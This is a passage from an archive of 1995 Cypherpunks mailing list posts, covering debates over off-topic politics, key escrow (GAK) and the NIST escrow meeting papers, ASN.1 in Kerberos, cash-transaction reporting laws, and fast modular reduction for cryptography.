> kick in some mud, too. There are lots of folks here who wear shoes --
> perhaps we could discuss the merits of different brands.
> 

Nope.  but the patriots & the cyPHerpunks share a common goal, and belief 
that it is none of the government's business what we think or want to 
share with our computers.

 > > The desire 
> > to protect one's privacy is a very "patriot" thiung to want to do.  
> 
> But this isn't a list for "patriot"s.

Yes it is.  This list is for anyone who wants to preserve their privacy, 
but I do understand what you really meant.  :-^)


> > CyPherpunks appears to be a lot of peole who are against big brother
> > government, and quite probably for restoring the constitution...am I right?
> 
> Cypherpunks is a list for people interested in cryptography and its
> impact on privacy, law, society, etc. It is not a list for people to
> discuss libertarianism, socialism, constitutionalism, whether the
> president has just flown over you ranch in a black helicopter, whether
> the CIA was responsible for brainwashing your pet rat Algernon,
> whether David Koresh was the messiah, or how many members of the
> Federal Protective Service it takes to change a paper shredder.

Agreed 

> 
> There are lots of places to discuss these topics on the net. There is
> only Cypherpunks for discussing the overall impact of cryptography on
> society, and this is a fairly good place to discuss crypto algorithms
> and the like because it is (amazingly) fairly high s/n compared to,
> say, sci.crypt. Please help out by not polluting one of the few places
> to discuss these issues with stuff you can talk about anywhere.

Again, I agree with you Perry.   In fact on a crypto-note [is that a 
word?] I would enjoy some discussion on SecDrv 1.4....anyone wanna take 
about it v. PGP?  [is it as secure as PGP?]


||||||||||||email address: starrd@iia2.org or starrd@cinenet.net|||||||||||
|    Creator of the original                |         Get paid to upload  |
|      Patriot's Archives                    \     shareware to BBSes and |
| ftp: iia.org /pub/users/patriot              \_____      the Internet!  |
| ftp: wuarchive.wustl.edu /pub/msdos_uploads/patriot\      Get file:     |
| For index of available files: descript.ion           \  uploader.zip    |
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQCNAzAN3FwAAAEEAOgWK9QJo3LIPXC+C/RHE+nmlddXPthC0hgLL7oKg7WPjYgk
LrX7j0eUmb5e6t2sm/PkJ1wjk839fqjUmRPLD0mhPX6KsMB0DoecYbCKLrNUY1gP
7DZijj9e7fuPaHqhuY7K5rGjN4po4ZxGhEPQv32IjQLSza9nbU05aMuMG71tAAUR
tB9EYXZpZCBXIFN0YXJyIDxzdGFycmRAaWlhMi5vcmc+iQCVAwUQMCnJQEY2REVK
Mit9AQG9AAQAps4lKzeQ/OQyXbvxG4b5wWsvHEK/K+1L/tfG0+EmlEsDARaN2pBD
cCslIKHjBa8al2BaTSsNjCUSHMgd+IWRp+nw2XJt/lRqpvTN5m7pPNAEQbSgCGwf
9kJ1IDPMokOw9XXAuGAqMQi9HogepNxp7JOdNphcJulHf9XbyCy/sig=
=0Tlq
-----END PGP PUBLIC KEY BLOCK-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 7 Sep 95 18:09:40 PDT
To: cypherpunks@toad.com
Subject: Legality of Cash Transactions
Message-ID: <ac74e578310210048bf7@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:05 AM 9/8/95, Tobin T Fricke wrote:
>>letting it happen, and using cash instead of credit, is the smart answer
>
>I'm somewhat surprized at how much of an issue this is.   The
>federal government prints up nice green paper for us to pay for
>things with.  It's annonymous (to a large extent), univerally
>accepted (most of the time), fairly untracably (unless you
>really want to), easily available, doesn't collect interest,
>free to use, etc.  No one is forcing anyone to use credit
>cards, etc..  Then again, being a kid, I have never bought
>anything with anything other than cash on the spot...

I agree with what I think your sentiment is, but bear in mind that "cash
transactions" are in fact limited by various laws and regulations about
reporting cash payments.

Try buying a car with cash, especially a car costing over $10,000.

Black Unicorn posted an account a while back (sometime last year) of his
efforts to pay cash for a new car.

The restrictions on cash are mostly oriented toward ostensibly stopping
"drug profits" from being used to buy expensive items. The usual cash
figure that invokes special laws is $10,000, with "structuring" of sub-$10K
cash transfers an additional issue.

I foresee more restrictions coming, not fewer.

Several of us have written extensively on this subject.


--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Theodore Ts'o <tytso@MIT.EDU>
Date: Thu, 7 Sep 95 15:25:19 PDT
To: cypherpunks@toad.com
Subject: Re: Kerberos v5's experience with ASN.1
In-Reply-To: <9509071925.AA17839@toad.com>
Message-ID: <9509072225.AA26823@dcl.MIT.EDU>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

   To: Cypherpunks Lite <cp-lite@comsec.com>
   Date: Sat, 2 Sep 1995 13:55:38 -0400
   From: jis@mit.edu (Jeffrey I. Schiller)

   However, the problem with ASN.1 isn't its waste of space (which actually
   isn't that bad for a mechanism for encoding arbitrary objects). 

While I won't argue about the rest of Jeff's note about the use of ASN.1
being a mistake, I do want to point out that certain ASN.1 types are in
fact very wasteful of space.

Most notable of these is the ASN.1 Generalized Time --- which encodes
the a timestamp in ASCII.  ASN.1 GeneralizedTime therefore requires 17
bytes to encode, an over four-fold increase in the amount of space
needed to store a time, compared with a 4 byte representation of "number
of seconds since 1970".  This is deadly in a protocol which has to store
lots of timestamps, which is the case in Kerberos V5.

We could have gotten around this problem by merely storing an integer
whenever we needed to store a timestamp, instead of using the ASN.1
abstract type.  Then it would have only taken 6 bytes (ASN.1 adds a
2-byte overhead for each object which you store).

					- Ted

-----BEGIN PGP SIGNATURE-----
Version: 2.6.1
Comment: Processed by Mailcrypt 3.2, an Emacs/PGP interface

iQCVAwUBME9xO0QVcM1Ga0KJAQGiQwQAhSu4WpeVZ+hsN+o+NvWMwP8JK0GojhuI
vWE1M3iIZttz4iMEbsziZ1KzWlkFTL8AKVWkzDAZ8t5lNMis9qObCfaQPQkKTLwJ
UV20GjebckOzFx7Rp9OPDDI536cepvcjFN0cQkWtmiW2KP04TU9zr4caD4cfozDJ
XYGZavYmpBQ=
=9YUm
-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Ellison <cme@TIS.COM>
Date: Thu, 7 Sep 95 16:09:15 PDT
To: jis@mit.edu
Subject: Re: ASN.1 and Kerberos version 5
In-Reply-To: <199509071800.LAA20586@comsec.com>
Message-ID: <9509072233.AA03587@tis.com>
MIME-Version: 1.0
Content-Type: text/plain


>Date: Sat, 2 Sep 1995 13:55:38 -0400
>From: jis@mit.edu (Jeffrey I. Schiller)


>I'll say it. I was the person who pushed for the use of ASN.1 in Kerberos
>version 5. I had this disease at the time that made me think that ASN.1 was
>a good idea. I got better, unfortunately we have been living with the
>results of my braino for quite some time now... poor Ted.

Jeff,

	I'm collecting lists of ASN.1 problems as well as better solutions.
If you'd care to contribute....

Otherwise, I'll post the results when they're firmed up.  I got some
*great* material from Burt Kaliski at the P1363 meeting and that needs
to be folded in, so I know it's not soup yet.

 - Carl




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: terrell@sam.neosoft.com (Buford Terrell)
Date: Thu, 7 Sep 95 15:52:29 PDT
To: cypherpunks@toad.com
Subject: Re: GAK
Message-ID: <199509072302.SAA02407@sam.neosoft.com>
MIME-Version: 1.0
Content-Type: text/plain


>Date: Sun, 3 Sep 1995 21:25:26 -0400 (EDT)
>From: Brian Davis <bdavis@thepoint.net>

>Subject: Re: GAK

>On Fri, 1 Sep 1995, Timothy C. May wrote:
>
>> At 10:56 PM 9/1/95, Buford Terrell wrote:
>> 
>> >If you've ever watched Not_at_all_Funny Home Videos or any of the
>> >American Urinal school of tabloid television, you soon start feeling
>> >that the real threat to privacy is not the guvmint, but all of
>> >the yoyos with their little cam corders running around pointing them
>> >at people.
>> >
>> >Security cameras in ATMS and at airline ticket counters do more
>> >to threaten you privacy than do FIBBIE wiretaps, and PGP won't
>> >protect you from them. (and usually neither will the courts).
>> 
>> I absolutely agree with this, though this doesn't mean I'll stop worrying
>> about the government's plans for key escrow (GAK), about limits on key
>> lengths, or about other efforts to thwart strong security.
>
>I, of course, know of the "dislike" of GAK here.  I am curious to know, 
>however, if the "dislike" is because government would have access under 
>any circumstances or if the primary worry is that government will cheat 
>and get access when most would agree that they shouldn't (either by the 
>judge "cheating" or a TLA stealing it).
>
>In other words ... if it took agreement by a review board composed of 
>non-LEA members of this list, would the escrow be acceptable??
>
>EBD
>
In my case, it's simply a matter of principle: the government has no
right to know what I'm saying.  Search warrants may allow them to
get to "things" that I have, but the First and Fifth amendments make
words sacred.  If the government can eavesdrop on my conversation,
then my speech is no longer free.

A review board consisting of cypherpunks has no more right to listen
to my private conversations than does the FBI, so I would not agree
to that proposal either.

  --buford





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rob L <robl@on-ramp.ior.com>
Date: Thu, 7 Sep 95 19:33:40 PDT
To: starrd <starrd@iia2.org>
Subject: Re: Collection of personal info
In-Reply-To: <Pine.BSD.3.91.950907172351.22454B-100000@usr2.primenet.com>
Message-ID: <Pine.LNX.3.91.950907193129.19445B-100000@on-ramp.ior.com>
MIME-Version: 1.0
Content-Type: text/plain





> 
> Welcome, you will learn a lot of great material here, and yes it is 
> neato.  I just wish it came pre-installed with WinDoze...

Don't worry, as soon as it becomes polically correct, and MS can find a 
way to make $$ on it, it will be rammed down our throats in WinDoze.. :)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rob L <robl@on-ramp.ior.com>
Date: Thu, 7 Sep 95 19:40:22 PDT
To: starrd <starrd@iia2.org>
Subject: Re: ON OFF-TOPIC
In-Reply-To: <Pine.BSD.3.91.950907173758.22454D-100000@usr2.primenet.com>
Message-ID: <Pine.LNX.3.91.950907193542.19445C-100000@on-ramp.ior.com>
MIME-Version: 1.0
Content-Type: text/plain



> > 
> > Was this really needed?
> 
> Yes, it is my bet that there are some patriots in this list.  The desire 
> to protect one's privacy is a very "patriot" thiung to want to do.  
> CyPherpunks appears to be a lot of peole who are against big brothert 
> government, and quite probably for restoring the constitution...am I right?

I am one as well.. being pro-2nd amendment, and pro-1st.. and learning 
lots about the fight to protect them. Unlike some of the non-US readers 
in this list, I can see the clear connection between the 1st and 2nd 
amendment attacks.. if one falls, the other does as well. Both are slowly 
being whittled away to nothing (i.e. you can have only certain 
'assault-style' guns, and you can only be guaranteed certain types of 
free speech)

RobL





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mac Norton <mnorton@cavern.uark.edu>
Date: Thu, 7 Sep 95 17:42:17 PDT
To: Rob Lowry <robl@on-ramp.ior.com>
Subject: Re: Collection of personal info
In-Reply-To: <Pine.LNX.3.91.950906210405.19265B-100000@on-ramp.ior.com>
Message-ID: <Pine.SOL.3.91.950907194034.19234A-100000@cavern>
MIME-Version: 1.0
Content-Type: text/plain


a sonewhat similar system does exist, also unser federal
statute, for credit reporting agencies.

YMMV

MacN

On Wed, 6 Sep 1995, Rob Lowry wrote:

> 
> > Nor was I suggesting a legal solution (I know your comment
> > was triggered by Rob's request for legal recourse) but instead
> > suggesting that things are farther along than some people realize.
> 
> Nor do I support additional rules/laws or regulations.. but if there are 
> existing ones to screw with, use 'em..
> Recently I had a bill turned over to collections from, of all places, the 
> daycare we used to take our kids too.. we owe them about $1300 in their 
> estimation. The reason we have not paid is due to 11 days of lost work 
> due to head lice that they provided to my kids, plus they stopped serving 
> breakfast which was in the contract we signed when enrolling the kids there..
> I was notified by the collection co. about this submittal (now $1500 for 
> some reason..) and by law, I can dispute this in writing, thus slowing 
> the wheels of the collection monster horribly. I did so.. and for the 
> last 4 months, they have been trying to prove I owe money.. I was asking 
> if such a system exist for the release of your credit info.. and it 
> appears that there is no safety mechanism in that monster.  Rather than 
> cry out for more laws to be twisted against us later, I agree that 
> letting it happen, and using cash instead of credit, is the smart answer 
> here.
> 
> Someone care to point me at e-cash info? sounds interesting.. remember, 
> I am new to the crypto scene and still think PGP is neato ;)
> 
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dr261@cleveland.Freenet.Edu (Tobin T Fricke)
Date: Thu, 7 Sep 95 17:32:47 PDT
To: cypherpunks@toad.com
Subject: Re: Collection of personal info
Message-ID: <199509080005.UAA26943@kanga.INS.CWRU.Edu>
MIME-Version: 1.0
Content-Type: text/plain


>letting it happen, and using cash instead of credit, is the smart answer

I'm somewhat surprized at how much of an issue this is.   The
federal government prints up nice green paper for us to pay for
things with.  It's annonymous (to a large extent), univerally
accepted (most of the time), fairly untracably (unless you 
really want to), easily available, doesn't collect interest,
free to use, etc.  No one is forcing anyone to use credit
cards, etc..  Then again, being a kid, I have never bought
anything with anything other than cash on the spot...

--
Tobin Fricke (aka LightRay)       The Digital Forest BBS (714)586-6142
dr261@kanga.ins.cwru.edu          KE6WHF Amateur Radio, 1:103/925 fido




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Thu, 7 Sep 95 17:14:46 PDT
To: cypherpunks@toad.com
Subject: Re: GAK Hacks
In-Reply-To: <8921.9509071941@exe.dcs.exeter.ac.uk>
Message-ID: <9509080010.AA06896@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



>One of their requirements was resistance to static patches, as someone
>else pointed out that is just not possible in software, if some gets
>really bored they can at worst disassemble the entire thing, and
>re-write it from scratch without any silly GAK stuff, or with a row of
>00s where the escrowed key goes.

I think I would prefer the escrowed key to a row of 00's, if someone wanted to 
use decode the message they could just use the all 00's key :-)

	Phill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: modemac@netcom.com (Modemac)
Date: Thu, 7 Sep 95 20:15:52 PDT
To: letters@2600.com
Subject: Scientology tries to break PGP - and fails?
Message-ID: <199509080312.UAA03808@netcom15.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


News Flash!

According to an informed source, the so-called "church" of Scientology is
trying to force Larry Wollersheim to give them his de-encryption code for
PGP. 

Larry Wollersheim is the director of FACTNet, a Colorado BBS that 
specializes in distributing information about religious cults - 
especially the Church of Scientology.  Scientologists raided FACTNet 
recently and seized its hardware and records recently, in a case that has 
spread news of the Scientology wars all over the Internet.

Scientology has been in possession of Larry Wollersheim's computer 
records for quite a while now - at least three weeks, I believe.  They 
have been scanning it for what they claim to be "copyright violations."  
Yet, their list of scanning criteria also includes a list of 34 names of 
their critics and enemies, including a famous Netizen named "Rogue Agent."

Yet it seems that despite all their efforts to get what they want, they 
can't break PGP - so they have to force Wollersheim to reveal the key.

Mr. Wollersheim has stated that he will go to jail before he reveals his 
encryption key.

Please forward this note to all interested parties.

Call this one: BIG WIN FOR PGP!

For more information on Scientology's war against the Internet, read the 
many Web pages set up to cover the story.  My own page, an "Introduction 
to Scientology," is:

	http://www.tiac.net/users/modemac/cos.html

It includes a link to the FACTNet Web page, as well as Ron Newman's 
famous Web page: "The Church of Scientology vs. the Net."




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 7 Sep 95 20:26:22 PDT
To: cypherpunks@toad.com
Subject: Correction about who opposes crypto regulations....
Message-ID: <ac75051735021004fa02@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 2:16 AM 9/8/95, hallam@w3.org wrote:
>>Nope.  but the patriots & the cyPHerpunks share a common goal, and belief
>>that it is none of the government's business what we think or want to
>>share with our computers.
>
>Poor you, the only major political party to come out with a pro crypto
>statement
>is a socialist party.

On the contrary, the Libertarian Party has come out strongly in favor of
cryptography and privacy, and they are consistently either #3 or #4 in
popularity. (I believe Peace and Freedom is usually #4 and LP is usually
#3.)

Their home page (http://www.access.digex.net/~lphq/lphq.html) says: "The
LPHQ is the center of activities of the Libertarian Party, the third
largest political party in the U.S. We stand for individual liberty, both
in terms of personal and financial freedom."

It is impossible to argue that the Libertarian Party is opposed in any way
to the right to encrypt, and their 1994 platform makes this clear:

"We oppose all  proposed regulations of civilian research on encryption
methods. We also  oppose government classification of such research or
requirements that deciphering methods be disclosed to the government."

I point this out not to argue in favor of the LP here, but to correct a
seriously incorrect statement.


--Tim May



---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aba@dcs.exeter.ac.uk
Date: Thu, 7 Sep 95 12:42:21 PDT
To: tcmay@got.net
Subject: Re: GAK Hacks
Message-ID: <8921.9509071941@exe.dcs.exeter.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain



Tim May <tcmay@got.net> writes on cpunks:
> We did it for SSL, let's do it for GAK.
> 
> Demonstrate that superencryption (encrypting within a GAK wrapper) defeats
> GAK. And other kinds of hacks, including releasing "damaged" (inoperative)
> versions of the proposed code (when it becomes available).

I was just drooling over the fun to be had if and when this crap goes
through.  Surely a very fun thing to do.  A new legit hobby for all
those games crackers out there.  (Hmm maybe not so legit, micro$oft
has non- reverse engineering clauses on their stuff, but that doesn't
stop anyone, and there's always remailers).

One of their requirements was resistance to static patches, as someone
else pointed out that is just not possible in software, if some gets
really bored they can at worst disassemble the entire thing, and
re-write it from scratch without any silly GAK stuff, or with a row of
00s where the escrowed key goes.

> Or releasing "work-alikes." Etc.
> 
> Granted, the demonstrations will be less clear than breaking the 40-bit key
> was, partly because there is no clear-cut standard out there, and many
> aspects of GAK are still in flux.
> 
> But it could still be a powerful example, an example "by direct
> demonstration," that government-mandated key escrow is problematic.
> 
> (Of course, a sufficiently powerful or clear demonstration, picked up by
> the popular press the way the SSL challenge was, could also cause the
> government to tighten up the rules on GAK, such
> as--speculatively!!!!--adding "compliance audits" to the GAK laws.)

So the question is what do you prefer: 40 bits only or 64 bits which
can be broken?  Is it worth sabotaging what is essentially an
impossible task open to having the GAK element hacked out?  It would
be much more fun if they'd agree to no limits on key sizes, and GAK.

What happens if the result of the talks which Pat Farrell kindly
described is that it is impossible?  What is their next move?  We've
had "voluntary" hard-ware key-escrow, and it got chucked out by
widespread derision of the idea, now the same in software.  Which
direction does the next phased attack come from?

> But GAK Hacking could be an interesting project.

indeed.

Adam





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 7 Sep 95 20:31:29 PDT
To: cypherpunks@toad.com
Subject: Shams and Shame
Message-ID: <ac75086236021004c02b@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 2:34 AM 9/8/95, Pat Farrell wrote:

>I am even willing to type in some, but that is known to cause typos,
>as I can't type, and even spellcheckers can't tell real words
>such as 'sham' from 'shame'

Yeah, it's a real sham you can't spel.

--Tin May



---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ghio@c2.org (Matthew Ghio)
Date: Thu, 7 Sep 95 18:02:47 PDT
To: cypherpunks@toad.com
Subject: Re: Commercial Speech over Internet product
In-Reply-To: <9508078105.AA810503582@snail.rsa.com>
Message-ID: <m0sqray-0012qWC@myriad>
MIME-Version: 1.0
Content-Type: text/plain


>        Here's an article about a commercial company that is doing speech
>over the Internet.  Maybe someone would like to help them add encryption.
>                --Bob Baldwin, speaking for myself only.

The program is a sound-listening extention for web-browsers.  There is
really no use for crypto because it's only processing information which
is already public.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Thu, 7 Sep 95 17:49:09 PDT
To: weidai@eskimo.com (Wei Dai)
Subject: Re: fast modular reduction
In-Reply-To: <Pine.SUN.3.91.950907131638.6760C-100000@eskimo.com>
Message-ID: <199509080048.UAA19561@clark.net>
MIME-Version: 1.0
Content-Type: text/plain



> 
> The numbers you give are a bit off.  Assuming a 32-bit machine,
> n=64 implies a 2048-bit modulus, and a 4096-bit number to be reduced. 
> Also, Karatsuba should use 1/3 (2*64^1.58 / 64^2) the multiplications
> rather than 1/5. 

The n=64 implies two 2048-bit numbers are being multiplied. The 2048-bit
number comes from the fact that in a typical crypto app, modexp
will be reducing numbers as large as the modulus squared which runs
2048-bits for a 1024-bit modulus. The reciprocal is 1 block
bigger than the number to be reduced. Hence, you are dealing with
multiplying about two 2048-bit numbers. But since we only care
about the "fractional" part of the result, we can safely throw
away half the computation and only compute half the Karatsuba
recursion tree. (the number before the decimal point is the
quotient) Then, to determine the final remainder, we simply
multiply by the modulus again, throwing away non-significant
computation again. There is a normal n^2 method for reducing
via reciprocal that only uses 1/4 the number of ops as the obvious
technique.

Your right about the 1/3 vs 1/5, I dunno where the 5 came from, must
have been a typo in my calcs. The problem with Karatsuba is that it's
hard to implement efficiently. Temporary ints should be kept to
a minimum and be preallocated. The combine step requires 1 store,
and 5 additions, of multiprecision integers. The split step requires
no copying if you use pointer manipulation, and instead of shifting,
don't add in place, but add "with shift" to the destination. Most
of the implementations I've seen do too much copying and shifting.

Given that some modern processors have efficient hardware multiply,
it might not be worth all the trouble to trade mults for adds. If
a processor has an efficient hardware FFT, it might even be worthwhile
to use the FFT multiply method.

Do you have a ref for the Montgomery method? I'm unfamilar with
the name, I wonder if it's something I've seen before under
a different label.

Check out Schonhage's book "Fast Algorithms" They've implemented
all the asymtotic algorithms efficiently and gathered
performance data. I corresponded with Schonhage's grad student
and he told me that Karatsuba wins for n>=8, which I find difficult
to see, when it takes about n=32 for my own implementation (not
optimized) to break even.

-Ray





 








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Thu, 7 Sep 95 17:55:55 PDT
To: cypherpunks@toad.com
Subject: Key Escrow Papers
Message-ID: <199509080055.UAA27687@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   We have scanned several of the handouts at the NIST Key
   Escrow Issues Meeting of September 6 (not present Sept 7).

   Perhaps someone, Pat Farrell or another, would be willing
   to make them available on a homepage or ftp site. If so we
   will send them over. If nobody volunteers we will send them
   by our puny e-mail contraption. Here's what we have ready
   to send:


   1. The outlines of meeting topics of Raymond Kammer of NIST
      and Michael Nelson of the White House. (7kb)


   2. Discussion Paper No. 4, "Example Potential Solutions for
      the Draft Export Criteria for Software Key Escrow
      Encryption," which offers example solutions for each of
      the ten criteria. (7kb)


   3. The Business Software Alliance's dissenting blast at the
      government's key escrow proposal and export limit. This
      paper was loudly applauded. (19kb)


   4. Trusted Informations Systems's "Thoughts on the NIST
      Escrow Issues Meeting Discussion Papers." (27kb in 2
      parts)


   5. TECSEC Incorporated's "Private Escrow Key Management: A
      Method and its Issues." (13kb)


   6. Dorothy Denning's "Comments on Draft Criteria for
      Software Key Escrow Exportability" and "Comments on
      Issues for Key Escrow Agents." (8kb)


   Two other papers will be scanned later:


   7. National Semiconductor's "Commercial Cryptography Ideas
      for Success" (9 pp. of large type) This contains
      graphics of the CAKE program and a "Proposed NIST Escrow
      Certificate Heirarchy" which cannot be easily
      distributed by us, so we offer this by fax.


   8. TECSEC's "The Merger of Technology and Cryptographic Key
      Management" (6 pp.).


   Note 1: It was Michael Nelson of the White House who said
   that the reason to maintain the 64-bit limit for export was
   because the key escrow methodology had not yet been proven
   reliable and that the security agencies insisted on the
   relatively weak system in case key escrow failed.


   Note 2: At the B-2 breakout session there was strong debate
   on a proposal for a "Criteria Zero":

      Before addressing any of the details of Criteria 3, 4
      and 9 as presented to us, Group B-2 registers its view
      that export under general license of strong encryption
      should not require key escrow.

   A vote on the proposal was 7 yes, 7 no and 13 absentions.
   It was not reported to the plenary session.










From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 7 Sep 95 17:57:56 PDT
To: starrd <starrd@iia2.org>
Subject: Re: ON OFF-TOPIC
In-Reply-To: <Pine.BSD.3.91.950907173758.22454D-100000@usr2.primenet.com>
Message-ID: <199509080057.UAA05313@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



starrd writes:
> On Thu, 7 Sep 1995, Perry E. Metzger wrote:
> > 
> > Was this really needed?
> 
> Yes, it is my bet that there are some patriots in this list.

Pardon, but I don't care. There are also several socialists on this
list. Shall I help them out by posting a long tract on the labor
theory of value? There are several religious christians here. Shall we
begin to discuss the divinity of Jesus? There are also some Jews here
-- we could have a bunch of religious debates, and the atheists could
kick in some mud, too. There are lots of folks here who wear shoes --
perhaps we could discuss the merits of different brands.

> The desire 
> to protect one's privacy is a very "patriot" thiung to want to do.  

But this isn't a list for "patriot"s.

> CyPherpunks appears to be a lot of peole who are against big brothert 
> government, and quite probably for restoring the constitution...am I right?

Cypherpunks is a list for people interested in cryptography and its
impact on privacy, law, society, etc. It is not a list for people to
discuss libertarianism, socialism, constitutionalism, whether the
president has just flown over you ranch in a black helicopter, whether
the CIA was responsible for brainwashing your pet rat Algernon,
whether David Koresh was the messiah, or how many members of the
Federal Protective Service it takes to change a paper shredder.

There are lots of places to discuss these topics on the net. There is
only Cypherpunks for discussing the overall impact of cryptography on
society, and this is a fairly good place to discuss crypto algorithms
and the like because it is (amazingly) fairly high s/n compared to,
say, sci.crypt. Please help out by not polluting one of the few places
to discuss these issues with stuff you can talk about anywhere.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Doug Hughes <doug@Eng.Auburn.EDU>
Date: Thu, 7 Sep 95 19:05:07 PDT
To: Pat Farrell <pfarrell@netcom.com>
Subject: Re: Notes from NIS&T Key Escrow Export conference.
In-Reply-To: <76629.pfarrell@netcom.com>
Message-ID: <Pine.SUN.3.91.950907210308.27820A-100000@nexus.eng.auburn.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 7 Sep 1995, Pat Farrell wrote:

> 
> >> It is clear that this meeting is a shame. Everyone in industry
> > A shame certainly, but I suspect you meant 'sham' (not a spelling flame,
> > the difference in meaning is important).
> 
> Sorry for the typo, yes, I meant sham, fake, theater, all smoke  and
> mirrors, nothing sincere, etc. See reference to "stage" above.
> 
> 
In this context, I think burlesque fits remarkably well. ;)
(Brings to mind a bunch of cross-dressors doing big theatre numbers
in exotic costumes)

____________________________________________________________________________
Doug Hughes					Engineering Network Services
System/Net Admin  				Auburn University
			doug@eng.auburn.edu
	Apple T-shirt on Win95 - "Been there, done that"





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Pat Farrell" <pfarrell@netcom.com>
Date: Thu, 7 Sep 95 18:18:20 PDT
To: cypherpunks@toad.com
Subject: Re: Notes from NIS&T Key Escrow Export conference.
Message-ID: <76629.pfarrell@netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


  "Peter Trei" <trei@process.com>  writes:
> I think we can infer from this that the USG has, or soon expects to have,
> the ability to brute 64 bits of key.

That is what I heard (implied) too. If not today, in a reasonably
foreseeable future. Remember, this is not an issue today, only weirdos
such as the c'punks care today. The govies move slowly. They are
setting the stage for tomorrow.

>> It is clear that this meeting is a shame. Everyone in industry
> A shame certainly, but I suspect you meant 'sham' (not a spelling flame,
> the difference in meaning is important).

Sorry for the typo, yes, I meant sham, fake, theater, all smoke  and
mirrors, nothing sincere, etc. See reference to "stage" above.

All typos are mine.

Pat

Pat Farrell    Grad Student      http://www.isse.gmu.edu/students/pfarrell
Info. Systems & Software Engineering, George Mason University, Fairfax, VA
PGP key available on homepage               #include <standard.disclaimer>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Joel McNamara <joelm@eskimo.com>
Date: Thu, 7 Sep 95 21:29:12 PDT
To: cypherpunks@toad.com
Subject: NIST Escrow Papers - Now Web Available
Message-ID: <199509080429.VAA22176@mail.eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


Several of the scanned hand-outs (courtesy of John Young) for the NIST September 5 workshop on key escrow are now available on my Web page:

http://www.eskimo.com/~joelm

Papers include: 

The outlines of meeting topics of Raymond Kammer of NIST and Michael Nelson of the White House. (KAMMER.TXT - 7kb)

Discussion Paper No. 4, "Example Potential Solutions for the Draft Export Criteria for Software Key Escrow Encryption," which offers example solutions for each of the ten criteria. (CRITERIA.TXT - 7kb)

The Business Software Alliance's dissenting blast at the government's key escrow proposal and export limit. This paper was loudly applauded. (BSA.TXT - 19kb)

Trusted Informations Systems's "Thoughts on the NIST Escrow Issues Meeting Discussion Papers." (TIS.TXT - 27kb)

TECSEC Incorporated's "Private Escrow Key Management: A Method and its Issues." (TECSEC.TXT - 13kb)

Dorothy Denning's "Comments on Draft Criteria for Software Key Escrow Exportability" and "Comments on Issues for Key Escrow Agents." (DENNING.TXT - 8kb)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Yih-Chun Hu <yihchun@u.washington.edu>
Date: Thu, 7 Sep 95 21:38:04 PDT
To: hallam@w3.org
Subject: Re: ON OFF-TOPIC
In-Reply-To: <9509080216.AA07325@zorch.w3.org>
Message-ID: <Pine.OSF.3.91j.950907213051.24322B-100000@saul3.u.washington.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 7 Sep 1995 hallam@w3.org wrote:

> 
> >Nope.  but the patriots & the cyPHerpunks share a common goal, and belief 
> >that it is none of the government's business what we think or want to 
